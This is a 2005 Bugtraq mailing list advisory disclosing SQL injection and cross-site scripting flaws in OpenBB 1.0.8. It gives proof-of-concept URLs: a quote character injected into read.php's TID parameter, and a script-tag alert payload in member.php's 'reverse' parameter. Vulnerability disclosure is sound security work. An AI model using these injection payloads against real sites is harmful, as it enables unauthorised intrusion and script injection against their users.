Bugtraq mailing list archives
OpenBB SQL Injection & Cross-site Scripting Vulnerability
From: Megasky <magasky () hotmail com>
Date: 13 May 2005 04:23:11 -0000
Open Bulletin Board www.openbb.com Vulnerable versions: 1.0.8 * OpenBB read.php SQL Injection Vulnerability Proof of concept: http://www.example.com/openbb/read.php?action=lastpost&TID=' http://www.example.com/openbb/read.php?TID=' * OpenBB member.php Cross-Site Scripting Vulnerability Proof of concept: http://www.example.com/member.php?action=list&page=2&sortorder=username&perpage=25&reverse="><script>alert('test');</script>
Current thread:
- OpenBB SQL Injection & Cross-site Scripting Vulnerability Megasky (May 13)